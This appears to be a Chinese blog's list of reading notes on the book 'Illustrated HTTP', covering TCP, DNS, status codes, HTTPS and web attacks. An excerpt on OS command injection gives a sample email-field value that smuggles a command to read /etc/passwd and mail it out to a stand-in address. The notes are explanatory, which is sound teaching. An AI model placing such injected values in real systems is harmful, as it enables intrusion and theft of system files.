图解HTTP读书笔记
程序员通通
这个作者很懒,什么都没留下…
展开
-
图解HTTP第一章(web和网络基础)
Web是建立在http协议上通信的1.2http的诞生1989.3http诞生三项WWW构建技术,吧SGML(标准通用标记语言)作为页面的文本标记语言的HTML,作为文档传输协议的HTTP,指定文档所在地址的URL1996.5http正式作为标准被公布1997.1公布http1.11.3网络基础TCP IP协议族通常使用的网络 互联网是在tcp ip协议族的基础上运作的,而http属于他原创 2018-04-08 00:53:27 · 224 阅读 · 0 评论 -
【http】简述TCP三次握手和四次挥手
三次握手是指建立一个TCP连接时,需要客户端和服务端总共发送3个包以确认连接的建立。可以想象两人用对讲机交谈。A:我准备好了你准备好了吗,收到请回答。B:收到收到,我也准备好了,收到请回答。A:收到收到四步挥手客户端:“兄弟,我这边没数据要传了,咱关闭连接吧。”服务端:“收到,我看看我这边有木有数据了。”服务端:“兄弟,我这边也没数据要传你了,咱可以关闭连接了。”客户端:“好嘞。...原创 2019-03-24 10:25:19 · 383 阅读 · 1 评论 -
【计算机网络】tcp udp的特点和区别
UDP协议面向无连接UDP 是不需要和 TCP 一样在发送数据前进行三次握手建立连接的UDP的不可靠性UDP 因为没有拥塞控制,一直会以恒定的速度发送数据。即使网络条件不好,也不会对发送速率进行调整。这样实现的弊端就是在网络条件不好的情况下可能会导致丢包但是优点也很明显,在某些实时性要求高的场景(比如电话会议,直播)就需要使用 UDP 而不是 TCP。TCP 面向连接,只有确认通信端存在...原创 2019-03-24 10:21:07 · 596 阅读 · 1 评论 -
http简单介绍
一个http请求报文包括:1,请求方法,URL,协议版本2,请求首部字段3,空行4,请求内容实体(如果有的话)如:一个http响应报文包括:1,协议版本,状态码(请求成功或者失败的数字),用以解释状态码的原因短语,2,可选的响应首部字段3,空行4,响应实体主体(如果有的话)如:curl的作用(类似于在浏览器中访问网址一样,只不过换成了命令行去访问)curl命令后加上网...原创 2018-11-04 20:23:19 · 251 阅读 · 0 评论 -
【JavaScript】牛客编程: 为数组 arr 中的每个元素求二次方。不要直接修改数组 arr,结果返回新的数组
function square(arr) { var arr2 = [] for(var i=0; i<arr.length; i++) { arr2[i] = arr[i]*arr[i] } return arr2}function square(arr) { return arr.map(function(elem, inde...原创 2018-10-27 14:51:22 · 904 阅读 · 0 评论 -
【Web技术攻击】OS(Operating System)命令注入攻击
OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的OS注入攻击案例:以表单的发送功能为例,该功能可将用户的邮件按已填写的对方邮箱地址放过去。攻击者将下面的值指定作为邮件地址:; cat /etc/passwd | mail hack@example.jp程序接收该值,构成以下的命令组合:“| /usr/sbin/sendmail ; cat /etc/passwd |原创 2018-05-06 22:41:31 · 2644 阅读 · 0 评论 -
【Web的攻击技术】SQL注入
相关概念SQL是用来操作关系型数据库管理系统(RDBMS)的数据库语言SQL注入是指针对web应用使用的数据库,通过运行非法的SQL语句产生的攻击SQL注入攻击案例正常处理:URL的查询字段指定q=上野宣,这个值由web应用传入到SQL语句中,构成了下面的SQL语句 SQL注入:吧刚才查询字段的上野宣改成”上野宣’–” SQL语句中的–之后全视为注释,即and flag = 1这个条件被自动原创 2018-05-06 21:44:59 · 300 阅读 · 0 评论 -
图解HTTP第七章:确保web安全的https
在http协议中有可能存在信息窃听或者身份伪装等安全问题。使用https通信机制可以有效的防止这些问题。7.1http的缺点通信(http协议通信的请求和响应的内容)使用明文(不加密),内容可能会被窃听。那么如何保护信息呢? 通信路线加密。Http协议中没有加密机制,但可以通过和SSL(安全套接层)或TLS(安全层传输协议)的组合使用,加密http的通信内容。与SSL组合使用的http被称原创 2018-05-05 09:25:27 · 386 阅读 · 0 评论 -
图解Http第四章:返回结果的http状态码
http状态码负责表示客户端http请求返回结果,借助状态码,用户可以知道服务器端是正常处理了请求。状态码数字中的第一位指定了响应类别,后两位无分类。相应类别有以下5种: . 类别 原因 1XX 信息性状态码 接收的请求正在处理 2XX 成功状态码 请求正常处理完毕 3XX 重定向状态码 需要进行附加操作以完成请求 4XX 客户端错误状态码原创 2018-04-14 10:46:22 · 328 阅读 · 0 评论 -
图解HTTP第五章:与http协作的web服务器
5.2通信数据转发程序:代理,网关,隧道http通信时,除了客户端和服务器以外,还有一些用于通信数据转发的应用程序,例如代理,网关和隧道,代理:是一种具有转发功能的应用程序,扮演了服务器和客户端中间人的角色,接受由客户端发送的请求并转发给服务器,同时也接受服务器发送的响应再转发给客户端。持有资源的实体服务器被称为源服务器,在http通信过程中,可级联多台代理服务器。请求和响应的转发,需要附加Via原创 2018-04-19 09:39:48 · 280 阅读 · 0 评论 -
图解HTTP第三章:HTTP报文内的HTTP信息
3.1 HTTP报文用于http协议交互的信息被称为http报文,客户端的报文称为请求报文,服务器端叫做响应报文http报文大致可分为报文首部和报文主体(不一定有)。报文首部:服务器端或客户端需处理的请求或响应的内容及属性报文主体:应被发送的数据3.2请求报文和响应报文的结构请求报文和响应报文的首部内容: 请求行:包含用于请求的方法,请求URI和http版本状态行:包含表明响应结果的原创 2018-04-13 08:42:46 · 261 阅读 · 0 评论 -
第二章:简单的HTTP协议
2.1 http协议用于客户端和服务端之间的通信请求访问文本或者图像资源的一段称为客户端,提供资源响应的一端称为服务器端2.2通过请求和响应的交换达成通信请求必定由客户端发出,而服务器端回复响应请求报文构成:请求方法,URL,协议版本,可选的请求首部字段和内容实体响应报文的构成:协议版本,状态码(请求成功或者失败的数字),用以解释状态码的原因短语,可选的响应首部字段以及实...原创 2018-04-10 13:19:38 · 226 阅读 · 0 评论 -
【DNS】DNS解析过程浅谈
DNS,域名服务,负责吧域名解析成IP。理论上讲一个全世界使用一个域名服务器就够了,但为了防止服务器过载,或者服务器出现故障,导致整个网络瘫痪。DNS被设计成一个分布式的数据库系统,即使单个计算机除了故障,也不会妨碍DNS系统的正常运行。在DNS请求报文中,为了减少开销和加快速度,使用的是UDP用户数据报方式域名服务器是一个树状的层次结构1,根域名服务器,根域名服务器知道所有顶级域名服务...原创 2019-04-09 16:51:56 · 383 阅读 · 0 评论